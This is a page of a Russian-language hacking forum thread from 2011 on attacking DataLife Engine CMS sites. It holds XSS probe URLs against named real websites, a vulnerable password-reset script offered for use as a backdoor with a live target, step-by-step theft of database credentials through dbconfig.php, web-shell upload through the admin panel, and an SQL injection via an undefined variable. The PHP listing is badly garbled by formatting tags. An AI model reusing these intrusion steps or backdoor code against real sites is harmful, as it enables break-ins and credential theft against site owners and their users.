HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 07.02.2011, 20:46
RexTiam
Постоянный
Регистрация: 02.11.2009
Сообщений: 341
Провел на форуме:
599124

Репутация: 65
По умолчанию

flinster, если не знаешь. Лучше не лезь сюда.

так же изучи что такое Open VPN и Дедики. И соксы.
 
Ответить с цитированием

  #202  
Старый 07.02.2011, 21:06
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Рекс, херню написал (я про пост со "сплоитами"). Не знаешь - не лезь.
 
Ответить с цитированием

  #203  
Старый 16.02.2011, 14:34
Je[K]inS
Guest
Сообщений: n/a
Провел на форуме:
748

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Критическая уязвимость всех версий DLE. Эта уязвимость работает на всех версия DLE. Баг позволяет выполнять любые действия, в том числе sql запросы.
целях предотвращения взлома - сам метод взлома не разглашается
Для лечения в config.php вставить:
Код:
Code:
'key'=>"УНИК КОД"
УНИК КОД заменить ваш код который знаете только вы
На лицензированных версиях баг не критичен, но шанс взлома есть.
Пиар лицензии или как ?

Слышал подвержены все => 9.0.

Кто знает как юзать дырку прошу пример в студию
 
Ответить с цитированием

  #204  
Старый 26.02.2011, 01:03
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от Je[K  
inS"]
Je[K]inS said:
Пиар лицензии или как ?
Слышал подвержены все => 9.0.
Кто знает как юзать дырку прошу пример в студию
Это вообще что-за баг? На официальном сайте нет про это, а в гугле описание бага нашел только на сайте, где он уже удален.
 
Ответить с цитированием

  #205  
Старый 26.02.2011, 01:54
KoT3
Guest
Сообщений: n/a
Провел на форуме:
1667

Репутация: 0
По умолчанию

Ты думаешь на офф сайте будут публиковать такую багу ?

Цитата:
Сообщение от None  
DataLife Engine : Если вы используете нулённую версию движка , то не забудте добавить ключ для неё
-> ппц ржунимагу...

Дырку врядли в открытую опубликуют ибо 25% рунета уйдёт ф попу ибо юзают нулл от DLE...

И врядли дыра вообще существует. Хотя надо проверить
 
Ответить с цитированием

  #206  
Старый 02.03.2011, 12:52
0x0
Guest
Сообщений: n/a
Провел на форуме:
720

Репутация: 0
По умолчанию

xss

Фотоальбомы для DataLife Engine

версия: 0.09 точно остальные не проверял

тип: XSS

site.ru/engine/photo/image.php?&filetype=gif&type=XSS

примеры

Код:
Code:
http://dle-photo.admin-club.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
http://www.turbooks.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
http://www.mysoft-bel.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
http://korshuniha.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
http://dams.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
http://nugon.ru/engine/photo/image.php?&filetype=gif&type=%3Ch1%3E111%3C/h1%3E
 
Ответить с цитированием

  #207  
Старый 14.03.2011, 19:08
piupiu
Guest
Сообщений: n/a
Провел на форуме:
2917

Репутация: 5
По умолчанию

Цитата:
Сообщение от Eviler  
Eviler said:
ребят, у кого осталась уязвимая версия lostpassword.php для 8,2 или кто может сделать такую же темку для 8,3?) надо прикрутить на сайт)
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT lostid FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lostid'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]$lostid[/COLOR][COLOR="#007700"]) {



[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users WHERE user_id='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]' LIMIT 0,1"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"012"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]srand[/COLOR][COLOR="#007700"]( ( double )[/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]() *[/COLOR][COLOR="#0000BB"]1000000[/COLOR][COLOR="#007700"]);



for
([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users set password='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$new_pass[/COLOR][COLOR="#007700"]) ) .[/COLOR][COLOR="#DD0000"]"', allowed_ip = '' WHERE user_id='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_gen'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_npass[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]

[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]  [/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#DD0000"]
[/
COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_pass[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"][/COLOR][COLOR="#0000BB"]$new_pass[/COLOR][COLOR="#DD0000"]

[/
COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]lost_info[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);



} else {

[/
COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$douser[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_err'[/COLOR][COLOR="#007700"]] );

}



} elseif( isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'submit_lost'[/COLOR][COLOR="#007700"]] ) ) {



if
([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] or ![/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] ) {



[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reg_err_19'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]"

[/COLOR][COLOR="
#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]all_prev[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);



} else {



[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec_code_session'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]safesql[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lostname'[/COLOR][COLOR="#007700"]] );



if
([/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'@'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]) )[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"email = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];

else[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"name = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT user_id, email, name FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users where[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]LIMIT 0,1"[/COLOR][COLOR="#007700"]);



if
([/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]num_rows[/COLOR][COLOR="#007700"]() >[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {



include_once
[/COLOR][COLOR="#0000BB"]ENGINE_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/classes/mail.class.php'[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]dle_mail[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_row[/COLOR][COLOR="#007700"]();

[/
COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]free[/COLOR][COLOR="#007700"]();



[/COLOR][COLOR="#0000BB"]$lostmail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];



[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]super_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT template FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_email where name='lost_mail' LIMIT 0,1"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );



[/COLOR][COLOR="#0000BB"]$salt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"012"[/COLOR][COLOR="#007700"];

[/
COLOR][COLOR="#0000BB"]srand[/COLOR][COLOR="#007700"]( ( double )[/COLOR][COLOR="#0000BB"]microtime[/COLOR][COLOR="#007700"]() *[/COLOR][COLOR="#0000BB"]1000000[/COLOR][COLOR="#007700"]);



for
([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DELETE FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb WHERE lostname='[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USERPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_lostdb (lostname, lostid) values ('[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#DD0000"]', '[/COLOR][COLOR="#0000BB"]$lostid[/COLOR][COLOR="#DD0000"]')"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%username%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostname[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

[/
COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%lostlink%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lostlink[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );

[/
COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"{%ip%}"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REMOTE_ADDR'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );



[/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lostmail[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_subj'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'template'[/COLOR][COLOR="#007700"]] );



if
([/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_error[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_info'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$mail[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]smtp_msg[/COLOR][COLOR="#007700"]);

else[/COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_ms'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_ms_1'[/COLOR][COLOR="#007700"]] );



} else {

[/
COLOR][COLOR="#0000BB"]msgbox[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'all_err_1'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lost_err_1'[/COLOR][COLOR="#007700"]] );

}

}

}
else {

[/
COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]load_template[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'lostpassword.tpl'[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'{code}'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"
[/COLOR][COLOR="
#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reload_code'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"

"
[/COLOR][COLOR="#007700"];



[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]copy_template[/COLOR][COLOR="#007700"].=

[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$lang[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'reload_code'[/COLOR][COLOR="#007700"]]}[/COLOR][COLOR="#DD0000"]';

};

//-->

[/COLOR][COLOR="#007700"]HTML;



[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]compile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'
content'[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]clear[/COLOR][COLOR="#007700"]();

}

[/COLOR][COLOR="#0000BB"]?>

[/COLOR]

[/COLOR] 
Сканер сайтов по данной уязвимости, на данный момент таких осталось ~ 4%

Но для своих бекдоров в самый раз.

Пример:

tomtel.org/index.php?do=lostpassword&douser=1&lostid=

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/
COLOR]

[/
COLOR
 
Ответить с цитированием

  #208  
Старый 25.05.2011, 22:40
sanchez
Guest
Сообщений: n/a
Провел на форуме:
982

Репутация: -1
По умолчанию

Воруем С DLE сайта пароли от бд

Вроде бы еще не было так что извеняюсь если повторюсь!

Взлом сайта на DLE версии ниже 9.0, инструкция (Работаем через браузер Opera 10).

1. Заходим на сайт жертвы

2. Регистрируемся и авторизуемся на сайте

3. Переходим по ссылке _http://site.ru/engine/images.php (где site.ru - адрес жертвы)

4. Открываем исходный код открытой нами страницы и после:

Код HTML:
HTML:
(строка может немного отличаться и повторяться 2 раза, вставляем после 1й)

Код HTML:
HTML:
Нажимаем в браузере, под вкладками Применить изменения

5. После этих действий необходимо проверить работоспособность дырки, для этого на странице http://site.ru/engine/images.php, чей исходный код мы редактировали пунктом выше, нажимаем Загрузить. В списке загруженных файлов должен появиться dbconfig.php, мы можем продолжить...

Что бы скачать файл конфига мы должны навести на него указатель мыши и посмотреть ID, затем через Исходный код страницы / Применить изменения мы вставляем в любое место страницы сайта жертвы ссылку вида:

[download]
[/HTML]

и скачиваем файл dbconfig.php с данными для входа в phpMyAdmin, адрес которой обычно site.ru/phpmyadmin/ или site.ru/myadmin/

Источник
 
Ответить с цитированием

  #209  
Старый 18.07.2011, 12:52
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию

Как залить шелл в DLE Статистические страницы -> Создаем любой новый(например system.html), показываем только админам.

Пишем в окошко исходный код любого шелла на php, выбираем HTML без фильтрации.

3) Сохраняем

4) Заходим по адресу: http://target.com/[dlepath]/system.html

Видим свой шелл, быстренько заливаем другой шелл, удаляем system.html с админки. Радуемся шеллу)))
 
Ответить с цитированием

  #210  
Старый 23.07.2011, 11:18
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию

Цитата:
Сообщение от slva2000  
slva2000 said:
С поиском так и не понял, что можно намутить
баг в поиске

позволяет выполнить любой SQL запрос

переменная sql_count не определена и если registr_global on ее можно установить

также она устанавливаеться в search.php в блоках

Код:
Code:
if( in_array( $titleonly, array (0, 2, 3, 5 ) ) )
if( $titleonly == 1 or $titleonly == 2 )
if( $titleonly == 6 )
чтоб этого не произошло устанавливаем titleonly = 4

Код:
Code:
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ